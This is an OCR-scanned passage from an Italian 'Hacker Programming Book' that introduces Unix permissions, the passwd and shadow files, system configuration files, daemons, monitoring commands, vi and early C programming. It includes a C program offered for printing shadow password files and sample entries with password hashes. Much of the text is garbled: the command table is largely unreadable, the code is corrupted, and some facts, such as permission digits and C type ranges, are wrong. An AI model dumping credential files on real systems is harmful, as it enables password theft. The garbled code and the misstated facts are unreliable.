User può leggere e scrivere 











— rwx rwx r—x 

I I I I > Gli altri possono leggere ed eseguire 

I I I > Gruppo può fare tutto 

I I > User può fare tutto 



Spesso i novizi di Unix, abituati a identificare i files eseguibili sotto DOS o sotto Windows 
dall'estensione .EXE, si chiedono quali possano essere quelli eseguibili in quest'ambiente. 
Un file eseguibile in ambiente Unix può possedere qualsiasi estensione solo che deve avere il 
bit di esecuzione (x) attivo. 

Un file eseguibile sarà quello visualizzato da un comando di list con la x. 
Ad esempio : 



$ls 



All'interno di un sistema Unix esiste sempre un utente chiamato supersuer il quale 
generalmente accede al sistema tramite il nome utente root. 

Questo utente ha la possibilità di vita e di morte su tutte le caratteristiche del sistema 
operativo a tal punto che questo potrebbe anche involontariamente cancellare file importanti. 
Per questo motivo normalmente l'accesso come root viene solo fatto in quei casi in cui si 
desidera apportare modifiche al sistema stesso. 

E' anche possibile accedere a Linux come utente normale e poi mediante il comando su è 
possibile diventare momentaneamente con i diritti di superuser. 

Su una volta lanciato richiede la password di root la quale veendo specificata fornisce 
all'utente tutti i diritti di root. 

Il cambio degli attributi avviene mediante il comando unix 



il quale deve avere come argomento un numero di tre cifre ciascuna delle quali rappresenta 
una delle permissions. 

Ogni numero viene composto sommando 1 per esecuzione, 2per la lettura e 4 per la scrittura. 
In pratica se volessimo dare al superutente il permesso di scrittura, lettura ed esecuzione, al 
gruppo e al proprietario solo lettura dovremmo imbastire il comando: 



Chiaramente per imbastire tali permessi o si è il proprietario del file o si è il superutente. 
Dentro al sistema Unix esistono diverse directory che possiedono scopi standard come ad 
esempio quasi tutti i file di configurazione sono posizionati dentro alla directory 



I device sono presenti dentro alla directory 
/dev 

I device di Unix sono di fatto visualizzati a livello di files e sono quelli mediante i quali è 
possibile colloquiare con la periferica hardware con cui il device è connesso. 
Ad esempio i device di riferimento ai floppy generalmente hanno il nome di : 
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fdO 

I device vengono usati specificandolo sulla linea di comando dell'utilities che si vuole 
utilizzare. 

Ad esempio se si desiderasse creare un dischetto di salvataggio per fare partire Unix in caso 
di pasticci è possibile utilizzare il comando mkbootdisk nel seguente modo: 



gli eseguibili invece sono presenti generalmente sotto 

/bin 

e sotto 



Nel primo caso i files eseguibili sono generalmente quelli usati da root poer la gestione del 
sistema operativo mentre i files contenuti dentro alla seconda directory sono quelli a 
disposizione degli utenti. 

La manipolazione delle directory avviene tramite i comandi 
ed 

mkdir 



La prima permette di cambiare la posizione di default dentro all'albero della struttura delle 
directory, il secondo ne crea una nuova mentre l'ultimo comando rimuove una directory vuota. 
Abbiamo detto prima che il sistema operativo Unix identifica all'accesso del sistema l'utente 
mediante quella che viene definita con il termine di login. 

I dati relativi agli utenti registrati vengono memorizzati dentro al file presente in /etc chiamato 
passwd. 

Perché il sistema possa funzionare è necessario che dentro a questo file ci sia il nome di 
login dell'utente, un identificatore chiamato UID e il numero del gruppo ovvero del GID. 
Fino a qualche tempo fa dentro a questo file c'era anche memorizzata la password. 

II problema era che questo file era leggibile da chiunque per cui la password veniva cryptata e 
salvata dentro a questo file come tale. 

Con il passare del tempo la potenza di calcolo dei sistemi è aumentata in modo vertiginoso 
per cui il pericolo che tale password potesse essere trovata iniziava a costituire un problema. 
La soluzione adottata fu quella di salvare la password da altra parte. 

Se andate a vedere il file /etc/passwd vedrete che al posto di dove una volta c'era la 
password ora c'e' solo un X. 

Questo sistema viene definito di gestione tramite shadow password. 
Il files senza shadow password era simile a : 

root : User : dlBdg : ln2HG2 : 1127: 20: Superuser 

TomJones :p5Y (hOtiC: 1229 :20: Tom Jones, : /usr/people/tomjones : /bin/csh 
BBob : EUyd5XAAtv2dA : 1129 : 20 : Billy Bob : /usr/people/bbob : /bin/csh 



Ora il file invece è simile a: 



root :x:0:l : Superuser : / : 

ftp : x : 2 02 : 1 02 -.Anonymous ftp : /ul/ftp : 

ftpadmin :x: 203 : 1 02 : ftp Administrator : /ul/ftp 



Un programmino adatto a stampare la shadow password è quello che segue : 



/* This source will/should print out SHADOWPW passwd files. */ 
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char *pw_name; 
char *pw _passwd; 
int pw_uid; 
int pw_gid; 
int pw_quota; 
char *pw_comment; 
char *pw_gecos; 
char *pw_dir; 
char *pw_shell; 

ì; 

struct passwd *getpwent () , *getpwuid(), *getpwnam() ; 
§±fdef elxsis? 

/* Name of the shadow password file. Contains password and aging info */ 

idefine SHADOWPW "/etc/shadowpw" 
idefine SHADOWPW_PAG " /etc/shadowpw. pag" 
idefine SHADOWPW_DIR "/etc/shadowpw. dir" 
/* 

* Shadow password file pwd->pw_gecos field contains : 
* 

* <type>, <period> , <last_time>, <old_time>, <old_password> 
* 

* <type> = Type of password criteria to enforce (type int) . 

* BSD_CRIT (0) , normal BSD. 

* STR_CRIT (1) , strong passwords . 

* <period> = Password aging period (type long) . 

* 0, no aging. 

* else, nuidber of seconds in aging period. 

* <last_time> = Time (seconds front epoch) of the last password 

* change (type long) . 

* 0, never changed.n 

* <old_time> = Time (seconds from epoch) that the current password 

* was made the <old _password> (type long) . 

* 0, never changed. ewromsinm 

* <old _password> = Password (encrypted) saved for an aging <period> to 

* prevent reuse during that period (type char [20]) . 

* ******** » r no <old_password> . 
*/ 

/* number of tries to change an aged password */ 
idefine CHANGE_ TRIES 3 

/* program to execute to change passwords */ 
idefine PASSHD_PROG "/bin/passwd" 

/* Name of the password aging exempt user names and max number of entires 
*/ 

idefine EXEMPTPW "/etc/exemptpw" 
idefine MAX_EXEMPT 100 

/* Password criteria to enforce */ 

idefine BSD_CRIT 0 /* Normal BSD password criteria */ 
idefine STR_CRIT 1 /* Strong password criteria */ 
idefine MAX_CRIT 1 
iendif elxsi 
idefine NULL 0 
main ( ) 
( 

struct passwd *p; 
int i; 

for (;!;) { ; 
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if (p==NULL) return; 
prlntpw(p) ; 

} 

ì 

printpw (a) 

struct SHADOWPW *a; 

{ 

printf ( "%s : %s : %d: %d : %s : %s : %s \n " , 

a->pw_name , a->pw_passwd, a->pw_u±d, a->pw_g±d, 
a->pw_gecos, a->pw_dir , a->pw_shell) ; 

} 

/* SunOS 5.0 /etc/shadow */ 

/* SunOS4 . l+c2 /etc/securlty/passwd. adjunct */ 



Il file delle shadow password invece ha la forma di quello che segue : 

root :R0rmc61xVw±51 : 10441 : 0 : 99999 : 7 : : : 

bin :* : 10441:0: 99999 : 7 ; ; ; 

daemon : * : 1 0441 : 0 : 99999 : 7 : : : 

aditi :*: 10441:0: 99999 : 7 : : : 

lp : * : 1 0441 : 0 : 99999 : 7 : : : 

sync :* : 10441:0: 99999 : 7 : : : 

shutdown : * : 1 0441 : 0 : 99999 : 7 : : : 

halt :* : 10441 :0: 99999 : 7 : : : 

mail :* : 10441:0: 99999 : 7 : : : 

news :* : 10441:0 : 99999 : 7 : : : 

uucp :* : 10441:0 : 99999 : 7 : : : 

operator : * : 1 0441 : 0 : 99999 : 7 : : : 

games :*:10441:0: 99999 : 7 : : : 

gopher :*:! 0441 : 0 : 99999 : 7 : : : 

ftp :* : 10441:0: 99999 : 7 : : : 

nobody :*:1 0441 : 0 : 99999 : 7 : : : 

mary : EauDLA/PT/HQg : 1 0441 : 0 : 99999 : 7 : : : 

bhilton :LkjLiWy08xIWY: 10446: -1 : -1 : -1 : -1 : -1 : 134529076 

Il programma inetd viene definito "super server" e il suo compito è quello di leggere un 
programma di rete il quale ha il compito di servire le richieste fatte su questa. 
Sempre dentro alla directory /etc è presente un file chiamato 

Inetd.conf 



Il quale è responsabile della partenza dei vari servizi. 

Linux utilizza una libreria di risoluzione per ottenere gli indirizzi IP corrispondenti ai nome 
degli hosts. 

Sempre dentro alla directory /etc esiste un file chiamato host.conf nel quale ogni riga indica 
a Linux quale servizio utilizzare per risolvere i vari nomi host. 

Il file services anche questo presente nella directory /etc vengono specificate le porte sulle 
quali i servizi standard vengono offerti. 

Il file /etc/securetty invece mantiene il nome dei terminali dal quale l'utente root può 
accedere al sistema. 

Molti file di inizializzazione del sistema risiedono sotto /etc/rc.d. 

Uno dei files presenti in questa directory è quello che viene eseguito quando un utente 
esegue il login nel sistema. 

A dire il vero è quello che si interessa di visualizzare allo user la versione del sistema 
operativo e che propone lo stesso prompt di login. 

Il file è re. locai nel quale a volte può anche essere presente un comando inserito 
dall'amministratore di sistema indirizzato ad attivare l'IP forwarding. 

Questa funzionalità è necessaria per poter successivamente utilizzare il mascheramento 
dell'IP tramite le funzioni del firewall. 
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La linea di comando è : 

echo >/proc/sys/net/ipv4/ip_forward ^^^^^^^^^^^M 

Un altro file importante presente sotto /etc è quello in cui è memorizzato il nome host del 
proprio sistema e precisamente il file HOSTNAME. 

Altri due file usati dal risolvitore di Linux sono /etc/resolv.conf e /etc/hosts.conf. 

Il file /etc/sysconfig/network viene utilizzato per specificare informazioni a proposito della 

configurazione del network desiderato sul proprio server. 

Quando il sistema parte necessita di conoscere la mappatura relativa ad alcuni host. 
Questo scopo è gestito tramite il file/etc/hosts. 

Resiste un comando che permette di ottenere la visualizzazione della configurazione delle 
interfacce di rete attive sotto Linux. 
Il comando è : 

ifconfig 

Uno dei ruoli fondamentali di Unix è sicuramente quello legato al suo utilizzo come firewall 

grazie a caratteristiche implementate a livello di kernel. 

Il sistema di filtraggio dei pacchetti funziona in Unix a livello di network. 

Solo i pacchetti che vengono autorizzati dai filtri del firewall possono passare attraverso il 

sistema. 

Chiaramente le regole di filtraggio vengono applicate dopo aver analizzato l'header dei 
pacchetti come abbiamo già visto in altri capitoli. 

Inoltre il sistema di firewall permette di eseguire il mascheramento degli IP. 

In altre parole un IP per essere visibile sulla rete deve essere tra quelli definiti come IP 

pubblici. 

Spesso i sistemi collegati in una intranet utilizzano IP adeguati ovvero tra quelli che sono stati 
riservati per tali scopi. 

Questi Ip non potrebbero essere visti sulla rete per cui è necessario un meccanismo che 
prenda quseti IP e li trasformi in IP pubblici. 

La gestione del firewall sotto Unix viene eseguito tramite il settaggio di un certo numero di 
files generalmente residenti sotto /etc/rc.d/init.d/ tra cui il più importante è: 

/etc/rc.d/init.d/firewall 

Dentro a questo file vengono definite le regole per il filtraggio dei pacchetti. 

Linux tra le tante cose dispone al suo interno di tutti i software per la gestione dei vari servers 

necessari per la gestione di un sistema di rete tra cui il server DNS. 

All'interno della directory /etc troviamo il file named.conf dentro al quale vengono definiti i vari 
servers di gestione dei dns. 

In questo file sono presenti le definizioni dei nameservers primari e secondari ed inoltre 
vengono definiti i percorsi e i nomi dei files contenenti i dati delle varie popone gestite dentro 
al DNS. 

In genere questi altri file vengono memorizzati dentro alla directory /var/named. 

Un altro server gestito da Unix è quelloi legato alla email come ad esempio SENDMAIL. 

Files legati alla gestione del server sendmail sono : 

/etc/m a il/access 
/etc/aliases 
/etc/sendmail.cw 
/etc/sendmail.mc 

Il server WEB Apache invece dispone di un files di settaggio il quale può essere posizionato 
sotto /usr/local/apache/conf e ha il nome di httpd.conf. 

I comandi principali di Unix 

Commando Descrizione 

alias Visualizza o setta un alias per una linea di comando lunga 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



Commando 

V* KJ 1 1 1 1 1 lui IVIW 


Descrizione 

L/vOUl Ifalwl l\* 


CI VV IV 


O.prpp iinp Qtrinnp iiin un filp p nunHn Ip. tr*n\/p peoni ip iinp fun7Ìnnp 

WCI Ua Ul ICl OLI II lyCl IUI 1 Ul 1 UIC C LjUIIUU ICl LI Uva COCyUC UIICl IUIl£-IUIIC 


ha 


Mim\/p un nrnppccn intprrnttn in hppknrnunH p In fp rinprtirp 

iviuuvc ui i ui uucoou ii liei i u l iu ii i ucur\y i uui iu c iu i ci i luai lii c 


UCl 1 


\/ÌCIIPlÌ77P il palpnHprin 
vioUdiiz.z.d 11 Ua.itJiiua.iiu 


f*Slt 
V/Ul 


f.nnppfpnp Hiip filpc. 
UUI lUalci la UUC l lieo 




fnmnilptnro t*~* 
V_/UI 1 lUlldlUl C O 


l*U 


pQmhia la Hiroptorx/ pneronto 
OalllUla la UlICUlUiy UUIICIIIC 


charn 


("ìpmhip il rininnn Hi pnnprtpnpn7P Hpì filpe 

w ai 1 1 u 1 a 11 y 1 uuuu ui auuai lci ici 1 z_a uci 1 1 1 co 


rhmod 

Wl IMI V* U 


rìpmhip 1 nprmpQQi Hi ppppc.cn pì filp*? 
wai 1 1 u 1 a 1 pei 1 1 icooi ui auucoou ai inco 


phnwn 

U 1 1 U VV 1 1 


f.pmhip il nrnnriptprpin Hpì filpc 
uai 1 luia 11 ui uui iciai ciu uci inco 


pheh 

Ul 131 1 


("*pmhip la Qhpll in un filp HpIIp npQQ\A/nrrl 
walllUla la ollCII III UN MIC UCIIc UaooVVUlU 


pipar 


f.pnppllp In Qphprmn 
uai lucila iu oui ici 1 1 iu 


orti ri 


Pnmnai'a Hi 10 filoc 
V_/UI II Udì d UUC lllco 


cp 


f nnip 1 in filp 
\_/UUid un ine 


r>ch 

VOI 1 


P* chpll Intprnrptp Hi rnmanrli 

0 oiicn — niiciuicic ui uuiiiaiiui 


Hato 
Udlfc. 


\/ÌC 1 1 3 1 Ì"7"73 Id Hata O l'ora 

VloUdllZ.Z.d Id Udld C 1 Uld 


vii 


\/ic 1 1 a 1 i"7"7Q 1 r\ cr\a"7Ìo lihoro in im H qto rm i n q to filo c\/ctom 
VloUdllZ.Z.d IU oUdZ.IU IIUclU III UH UCICI 1 1 1 II IdlU MIC oyoLclll 


Hiff 
UHI 


Vici iali"7"7a lo Hifforon"70 tra Hi 10 filo 
VloUdllZ.Z.d IC UIIICICIIZ.C II d UUC MIC 


du 


VÌCIIPlÌ77P |'|ltÌIÌ77n HpI filp QV/QtPITI 
v louui 1 i—i—GL 1 uni \ £-£—\j u ci ine 0 y 0 ic 1 1 1 


Cvl ■ V* 


VìciipIÌ77p ci ill'ctHni it Ip linpp Hi tPQtn np^QPtp pnmp prnnmpntn 

v louuii L-i-Cx ou 1 1 0 iuuu l ici 111 irja ui ico lu uaooaia uui 1 1 c aiyuiiiciiiu. 


Cu 


Tovt oHitor 
1 CAI CUIIUI 


elm 


p-mpil hp^ptn qjiI tPQtn 
c iiian uaoaiu oui icoiu 


ornare 
« — 1 i iciv#o 


Tpvt pHitnr 

1 CA L CUI LUI 


f77 


FORTRAN77 pnmnilptnrp 

1 \-J 1 1 1 1 \r\i \ I I UU 1 1 1 Ul 1 CI LU 1 C 


fa 
■y 


Mim\/p un nrnppQQn hlnppptn in fntrpnrm inH p In fa rinprtirp 

1 vi uu v c un ui uuc 00 u uiuuucilu 111 luucyiuuiiu c iu ici 1 1 uai LI 1 c 


finri 

III IU 


Trn\/p un filp pnn Ip pprpttprictiphp cnppifipptp 
1 lUVd UN MIC UUI 1 IC Udì dllCI lollUI IC oUCUIIIUdlC 


ftn 


FTP 


nrpn 


forpa in un filo il nattorn cnopif ipatn 
uClUa III UN MIC II UdllCI 1 1 oUCUIIIUdlU 


hpflH 

1 ICQU 


Vici ip|Ì77p l'inÌ7Ì7n HpI filp fin nf^nf^rf^ Ip nrimp 1fì linpp\ 

v loUaiiiLiLa I 1 1 \ \L.\L-\J UCI ine 1 1 1 1 y ci lei c IC u 1 1 1 1 1 c 1 u iniccf 


hpln 


\/ìqi IP.IÌ7P. l'hpln 
v loUdiiZ-d 1 1 iciu 


hn^tn^mp 
i iuou idi i ic 


\/ici IP.M77P. il nnmp Hpll'hnQt 
v louai 1 £-£-Cl 11 1 iui 1 ic ucn 1 tuoi 


kill 

rV III 


Tprminp un nrnrpQcn 
1 ci 1 1 1 1 1 ia un ui uucoou 


Ireh 

l\oll 


LCnrn choll lntorr\roto Hi pnm anrli 
r\UI 1 1 ollCII — IIUCipiClC Ul UUIMdllUI 


In 
ni 


Peoni 10 il link Hi filoc 
CocLJUc II llllrx Ul IIICo 


Ina 


Vici mlÌ77a la pnHp Hi Qtpmna 
v louaii £-£-cx ici uuua ui oiai 1 1 ua 


Inr 
ipi 


ln\/ip una ctpmnp pIIp pnHp 
nivid Ul id OLaiiiUa alia UUUd 


le 


\/ici iali"7"7a 1 filoc in una Hi ror'tnrx/ 
VloUdllZ.Z.d 1 IIICo III Ul Id Ul 1 CUlUI y 


mail 


Ivia un pmail 

1 v 1 ca la 1 1 v* 1 1 1 a. 1 1 


man 


Accf^cif^ al maniialp nnlinp 
nuucuc ai iiiaiiuaic uiiiiiic 


mkdir 


Orpp una niin\/p Hirpptnrv 
ui ca uiici 1 1 uu v a un cu lui y 


more 


Vici ialÌ77a 1 in filp 1 ina nomina n 1 ina r*inp. npr \/nltp. 

v louaii ì-ì-Ck u 1 1 1 1 ic u 1 ici uay mici u uiici 1 ly a uci v ui la 


mv 


K/liin\/p n rinnminp un filp 
iviuuvc u 1 1 1 1 u 1 1 1 1 1 1 a uii ine 


naccu/H 


ì*™* a m hi a 1 a t~\r c\t~\r \ cà naccu/nrH 
OdIMUId Id piupild pdooWUlU 


nicn 


FHitnr Hi tpcfn 

l—UI LUI Ul LCOIU 


ni no 
JJII le 


Pro/Dramma noctinno omail hacata ci il tocto 
r lUyidllllMd yCollUIIC Cllldll Udodld oUI IColU 


ne 


Vici IP.IÌ77P. In cfptn Hpì nrnppQQi 
vioudii^-^-d iu oidLU uci ui uucooi 


pwd 


\f\^iifi\\77fì la Hirpptnrv in pijì ^i p nn c ìi7innati 

v 10 u cii \£-£-d ici un cuiui y 11 1 uui 01 c uuoii-iui icili 


rm 


rìanppllpi un filp 

ucn lucna ui 1 ine 


rmdir 


Cancella una directory 


Sed 


Editor di linea 


sh 


Interprete di comandi Bourne 


sleep 


Mette in pausa un processo 


sort 


Ordina ed esegue il merge di un file 
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IsUlllllldllUU 


Ucol#l l£IUI Iti 


cnl it 


Qnlitta un filp in nifi filpc 

0|JllllCl Ull MIC III \J\\J llluo 


talk 


fhat nriontatr» al toctr» 
Oliai UMollldlU di lublU 


tplnpt 


Fmi ilatnrp Tprminalp 

1 1 1 1 U IdLUl C Idilli! IdIC 


1 li irn 


Qictoma nor la zinnia Hi filp 1 Iniv tn 1 Iniv 
O lo lei 1 Id fJcl Id UULJIcl Ul MIC Ul II A LU Ul HA 


uudecode 


Decodifica un file uuencoded 


uuencode 


Codifica un file binario 


vi 


Editor di testo 


who 


Visualizza chi è loggato dentro al sistema 


whoami 


Visualizza il proprio nome con cui si è entrati nel sistema 


whois 


Cerca un utente remoto o siti 



Dal punto di vista hacker è utile avere la dimestichezza rispetto l'uso di alcuni comandi che 
permettono di vedere la presenza degli utenti collegati al sistema. 

Uno di questi è il comando WHO il quale ci fornisce tutte le informazioni degli utenti connessi. 
L'output è come quello che segue : 



% who 



mike 


pts/1 


Jul 


26 


16:50 


( ) 


Jane 


pts/2 


Jul 


26 


19:15 


( ) 


andy 


pts/7 


Jul 


26 


20:37 


(foobar 


mike 


pts/4 


Jul 


26 


18:49 


( ) 


Jane 


pts/5 


Jul 


26 


17:56 


( ) 




I Demoni Unix 

I demoni Unix sono i programmi fatti partire a bootstrap che rimangono poi sempre in 
esecuzione. 

Essi non sono perciò' collegati a un particolare utente e terminale. 

Assieme costuituiscono un formidabile gruppo di geni della macchina pronti a servirci in tutte 
le nostre necessita'. 

Nell'uscita del comando ps -eaf essi compaiono subito dopo il processo init di numero 1 , 
come processi fatti partire dal processo stesso (quindi con un 1 in terza colonna). 
Come sa il sistema quali demoni far partire? 

Come avviene in molti casi in Unix, la configurazione viene fatta aggiungendo 2 file di testo 
per demone con un nome speciale in una speciale cartella. 

II file di testo sndemone contiene lo script di partenza, kndemone lo script di terminazione. 
Queste cartelle vanno create per ogni runlevel del sistema operativo. 

Un run level e' una delle modalità' di run che si sceglie all'inizio ed e' indicata da un numero 
(0:halt,1 :singolo utente(si indica anche con "s"),2:multiutente senza rete, 3:multiutente con 
rete, 5:multiutente con rete e interfaccia frafica, 6:reboot). 

Ad esempio il computer prima visto stava girando in runlevel 5 e la cartella usata per i demoni 
era la /etc/rc.d/rc5.d/ . 

I demoni sono fatti partire dal processo init in ordine alfabetico dei file s*. 

Se volete far partire un nuovo demone basta aggiungere due nuovi files in questa cartella col 

nome appropriato. 

Quando init fa partire un demone invia allo script la stringa "start". 
Quando invece lo stoppa (allo shutdown) invia la stringa "stop". 

Per questo spesso i 2 programmi sndemone e kndemone sono dei link allo stesso 
programma che reagisce opportunamente alle stringhe start e stop. 
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Questo programma viene messo nella cartella /etc/rc.d/init.d. 

Ad esempio Apache fornisce lo script apachectl già' pronto che può essere inserito in questa 
directory. 

Dovunque poi e' necessario usare lo script si definisce con un link: 



Da root e' possibile passare da un runlevel all'altro dando il comando 
init numerolivello 

Da notare che il passaggio da un livello all'altro comporta sia start che stop di servizi. Solo il 
passaggio al livello 0 comporta la disattivazione di tutti i servizi. Lo spegnimento del computer 
ottenuta col comando 



shutdown -h now 

e' diverso come effetti da 



in quanto provoca un kill immediato di tutti i servizi. 

Possiamo definire, se lo riteniamo necessario, altri runlevel impostando opportunamente 
/etc/inittab e introducendo nuove cartelle rc.d. 

Un demone molto particolare e' quello chiamato inetd : questo e' un "super server" collegato 
ai servizi TCP/IP e viene introdotto per limitare il numero di demoni in esecuzione 
contemporanea. In pratica se un particolare servizio sarà' usato poche volte durante il giorno, 
e' inutile farlo partire come un demone a parte, ma lo si può' definire come un servizio inetd. 
Il demone inetd farà' in modo da far partire il servizio relativo quando viene richiesto. 
Uno speciale file /etc/inetd.conf lista i servizi da far andare sotto inetd. 
Si parla perciò' di demoni inetd in contrapposizione di quelli standalone. 
Un altro demone particolare e' cron che provvede ad eseguire dei comandi a tempo per i 
singoli utenti seguendo le direttive dei filecrontab dei singoli utenti. 



M onitoraggio di sistema 

Versione sistema 



Spazio e partizioni su 
disco 

Lista dei messaggi di 
boot 

Lista dei processi 

Percento risorse usate 
adesso e processi più' 
attivi 

Uso memoria virtuale 

Connessioni di rete 
aperte in questo 




Stato rete 

Files e connessioni 
(socket) aperte adesso 

Monitoraggio con 



uname -a 
df 

cfdisk 
dmesg 
ps -eaf 

top 

vmstat 1 
netstat 

netstat -na |grep -i listen 
netstat -na jgrep -i 
established 

tcpdump 
tcpdump -n 

ping -f nomecomputer 
Isof 

fuser -v . 

Programma MRTG Multi 
Router Traffic Grapher 



Il secondo comando ci dice quali demoni stanno 
ascoltando alle varie porte, il terzo quali 
connessioni con l'esterno sono aperte in questo 
momento 

Col secondo comando si evitano i paccheti 
generati da tcpdump stesso per trasformare i 
numeri tcp/ip in nomi 
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du -ks nomecartella 



who o w:quest'ultimo da' 

. . ,. ,, più' informazioni. 

Lista utenti co egati \ t . , . ■ . ,- 
a last -1 00 da la stona degli 

ultimi 100 collegamenti 

Dimensione dell'albero 
a partire da una cartella 

Ultimi messaggi di , ., , , „ , 

aa tail -f /var/log/messages 

sistema a a 

Messaggi su tutti i log , , , 
di sistema 9 

Librerie e programmi , . _ , , , , 

installati rpm " qa Linux Red Hat 



Comandi vari 



sono sulla vostra tastiera 


Aggiungete nella vostra home directory al file .Xmodmap le 
righe: 

keycode 117 = Mode_switch 
add Mod3 = Mode_switch 

(il 1 1 7 deve riferirsi a un tasto non usato come quello di 
Windows) Ora date il comando 
xmodmap -/.Xmodmap 

Premendo contemporaneamente il tasto prescelto con altri 
tasti si accedono ad altri caratteri della fonte che si sta 
usando 


i 

Conoscere le fonti e i caratteri disponibili 


xfontsel 


Conoscere il codice corrispondente a un 
tasto 


xev 


Come avere l'output di un comando sia 
rediretto su un file che sulla consolle 


Is-I |tee temp.lis 


Avere una lista di tutte le pagine man 


xman 


|Copiare un file conservando i permessi 


cp -p 


lUnzippare e starare un file conservando il 
file compresso originario e senza creare 
file intermedi 


gunzip < file.tar.gz | tar xvt - 


|Per far scorrere l'output in una finestra 
terminale senza ricorrere al cursore e al 
|mouse 


Usa i tasti CTRL+Pageup e CTRL+Pagedown 


|per poter usare il debugger 


Esegui la compilazione del programma con l'opzione -g . 
Dopo mandato in esecuzione trova il pid del programma e 
dai l'istruzione 

gdb /cammino/programma pid 


|Per spostare un programma in 
packground 


CTRL-Z e quindi fg 


|Per far riconoscere i tasti cursore in una 
finestra 


set -o emacs or setenv TERM xterm 


|Per trovare le cartelle che occupano più' 
spazio su disco 


du -k nomecartellaprincipale|sort -r -n|less 


|per leggere un dischetto msdos 


mount -t msdos /dev/fdO /mnt/floppy come root. 

Ricordati di dare umount /mnt/floppy e se dice che il device 

e' busy fare il ed su una cartella diversa di /mnt/floppy. 


|Per sapere quali job sono in attesa di 
stampa per una data stampante remota 


Ipq -Pstampante 


Per dare la priorità' minima a un job che 
consuma molta memoria 


renice 19 -p pid 
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Per far ripartire la stampa che sembra 
bloccata 



Da root dare Ipc quindi status , stop nomecodastampa, start 
nome codastampa, status 

talvolta e' necessario dare abort nomecodastampa invece di 
stop codastampa 



I comandi dell'editor VI 



la stringa xxx in yyy in tutto il testo 


:%s/xxx/yyy/g 




Cancellare tutte le righe contenenti xxx 


:g /xxx/d 




Esegui il comando cmd su tutte le righe che 

òUUUIòIdNU CLUUt &bb 


:g address cmd 

=\ 


Address può' essere % n1,n2 . n $ 

ni n ri 1 i n /etri rìn a / 9cfWnri3 9 
Il I -fi ili +fl /blfliiyd/ rblflflya f 


Cancella tutti i caratteri fino al prossimo 












modifica tutti i caratteri fino al prossimo 
carattere apice 


s/' 




modifica tutti i caratteri fino alla fine riga 


C 




[cancella tutti i caratteri fino alla fine riga 


D 




Lista tutte le opzioni per ex 


:set ali 




Lista le opzioni impostate per ex 


:set 




Lista il file con i numeri di riga 


:set number 


set nonumber 

tornerà' alla modalità' senza 
numeri di riga 


Copia le righe da n1 a n2 dopo n3 


:n1 ,n2 m n3 




Trasferisci le righe da n1 a n2 dopo n3 


:n1,n2tn3 




Sostituisci ogni numero di una o più' cifre con 
un "uguale" davanti con la stringa "numero" 


:%s/=[0-9][0- 
9]7numero/g 




Lista tutte le assegnazioni di comandi a 
caratteri 


map 





Ricerche : 



ricerca tutti i numeri(senza punto) 


1 

/[0-9][0-9]* 


* indica 0 o più ripetizioni di 
cifra 


ricerca numeri tep-ip 


/[0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\.[0- 
9][0-9]*\ 




ricerca richieste al server diverse da 


/+0100] "[A-F.H-Z] 
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I linguaggi 

A questo punto iniziamo a vedere che cosa servono i linguaggi di programmazione. 

Come abbiamo detto precedentemente il lavoro dell'hacker deve necessariamente includere 

un qualche cosa di programmazione sia con linguaggi ad alto livello che con quelli a basso 

come ad esempio nel caso dell'assembler. 

Perché questo ? 

I linguaggi ad alto livello servono per poter scrivere i moduli necessari per poter proiettare 
nella realtà le teorie legate ai sistemi di sicurezza. 

In altre parole si deve essere in grado di poter scrivere dei softwares che agganciandosi a 
delle librerie come quelle Socket o altre possano ad esempio manipolare i protocolli di 
comunicazione. 

E questo è solo uno degli esempi. 

II secondo tipo di programmazione invece è necessario più per sapere seguire il codice di 
certi programmi di quanto lo sia la necessità di usarlo per scrivere dei moduli funzionali. 

Se dovessimo disassemblare qualche programma per riuscire a vedere dove magari è 
possibile trovare un punto su cui basarsi per la creazione di un sistema di buffer overflow, 
dovremo essere capaci di seguire le istruzioni in assembler del programma. 
Un programma, a parte il fatto di eseguire delle serie di calcoli, gestisce un flusso di 
esecuzione in relazione al colloquio tenuto con l'utente. 

In pratica, portando un gioco come esempio, ci saranno dei calcoli interni fatti dalla CPU 
destinati a creare le immagini visualizzate a video mediante funzioni di I/O sulla scheda 
grafica ma ci saranno anche altre funzioni destinate a leggere l'input da tastiera indirizzate a 
stabilire dove deve essere posizionato ad esempio l'immagine del personaggio del gioco 
stesso. 

Quindi un linguaggio possiede istruzioni destinate ad elaborare dei valori contenuti dentro a 
delle variabili ma anche altre destinate a eseguire valutazioni indirizzate a gestire i flussi di 
elaborazione. 

Ma che in cosa consiste programmare ? 

Programmare significa creare i modelli matematici dei problemi che devono essere riprodotti 
su di un sistema informatico, mediante l'analisi di questi con la dichiarazione delle variabile 
dei dati descrittivi e mediante la creazione di tutte e istruzioni destinate a manipolare questi 
dati. 

Da questo si comprende che la programmazione in genere può essere suddivisa in due parti 
ovvero : 




Nella prima fase si osservano i problemi, suddividendoli, se possibile, in problemi minori e 
quindi più' semplici, identificando tutti i dati che sono necessari per la descrizione di questi. 
Supponendo ce dobbiamo creare un programma che calcola le aree di parallelepipedi 
dovremo memorizzare da qualche parte i valori dei due lati necessari per l'esecuzione del 
calcolo. 

Prima parlando di memoria avremmo potuto riservare alcuni BYTES per questo scopo. 
In altre parole ci saremmo potuti scrivere da qualche parte che l'altezza del parallelepipedo 
veniva memorizzata all'indirizzo 000001 000 e quella della larghezza all'indirizzo 00001 002. 
Nei linguaggi a più alto livello, nella fase dichiarativa, è possibile usare il concetto di variabile. 
La dichiarazione di una variabile ci permetterà di riferirci successivamente ad un valore senza 
doverci preoccupare di dove il sistema ha memorizzato, come indirizzo d memoria, un certo 
valore. 

In altre parole definendo la variabile altezza e quella larghezza potremo successivamente 
riferirci mediante il loro nome a queste ignorando di fatto a quale indirizzo il linguaggio ha 
memorizzato il tutto. 

Prima avevamo anche detto che un valore possiede un indirizzo di dove questo viene 

memorizzato ma anche di una dimensione in bytes. 

La dichiarazione di una variabile in linguaggio Cha la seguente sintassi : 

classe di memoria tipo nome 

Lasciamo perdere per ora la classe d memoria e vediamo solo le altre due specifiche. 
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Il nome è quello che ci permetterà di identificare un certo valore. 

Normalmente può essere una stringa fino a 32 caratteri, anche se questo dipende dal 
compilatore. 

Il tipo invece è quello che stabilisce la dimensione massima che può memorizzare la 

variabile. 

I tipi sono : 

char (1 BYTE ) 255 valori da -127 a +128 

Int ( 2 BYTES ) 65536 valori da -32767 a +32768 

long ( 4 BYTES ) 4miliardi di valori da - 2 miliardi a +2 miliardi e rotti 

Questi in linguaggio C sono da considerare proprio come sequenze di N BYTES. 
Es. 



